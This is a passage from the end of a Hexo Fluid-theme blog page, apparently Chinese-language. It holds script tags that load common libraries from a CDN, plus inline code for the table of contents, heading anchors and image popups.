  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    function isExpandAllEnabled() {
      return CONFIG.toc && CONFIG.toc.expand_all === true;
    }
    function expandAllToc() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .tocbot-is-collapsed').removeClass('tocbot-is-collapsed');
    }
    function updateTocToggle($li, $childList) {
      var $toggle = $li.children('.toc-toggle');
      if ($toggle.length === 0) { return; }
      var collapsed = $childList.hasClass('tocbot-is-collapsed');
      $toggle
        .toggleClass('toc-toggle-collapsed', collapsed)
        .toggleClass('toc-toggle-expanded', !collapsed);
    }
    function bindTocToggle() {
      if (!isExpandAllEnabled()) { return; }
      jQuery('#toc-body .toc-list-item').each(function() {
        var $li = jQuery(this);
        var $childList = $li.children('ol');
        if ($childList.length === 0) {
          if ($li.children('.toc-toggle').length === 0) {
            $li.prepend('<span class="toc-toggle toc-toggle-placeholder" aria-hidden="true">›</span>');
          }
          return;
        }

        if ($li.children('.toc-toggle').length === 0) {
          $li.prepend('<span class="toc-toggle toc-toggle-expanded" aria-hidden="true">›</span>');
        }
        updateTocToggle($li, $childList);
      });
      jQuery('#toc-body').off('click.tocToggle').on('click.tocToggle', '.toc-toggle', function(e) {
        e.preventDefault();
        e.stopPropagation();
        var $li = jQuery(this).parent('.toc-list-item');
        var $childList = $li.children('ol');
        if ($childList.length === 0) { return; }
        $childList.toggleClass('tocbot-is-collapsed');
        updateTocToggle($li, $childList);
      });
      if (!window.__tocToggleObserver) {
        window.__tocToggleObserver = new MutationObserver(function(mutations) {
          mutations.forEach(function(mutation) {
            if (mutation.type !== 'attributes' || mutation.attributeName !== 'class') { return; }
            var $list = jQuery(mutation.target);
            var $li = $list.parent('.toc-list-item');
            if ($li.length === 0) { return; }
            updateTocToggle($li, $list);
          });
        });
        jQuery('#toc-body ol').each(function() {
          window.__tocToggleObserver.observe(this, { attributes: true });
        });
      }
    }
    var tocConfig = Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc);
    if (isExpandAllEnabled()) {
      tocConfig.collapseDepth = 6;
    }
    window.tocbot.init(tocConfig);
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }
    expandAllToc();
    bindTocToggle();

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
        expandAllToc();
        bindTocToggle();
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>




  
<script src="/js/love.js"></script>
<script src="/js/sakura.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
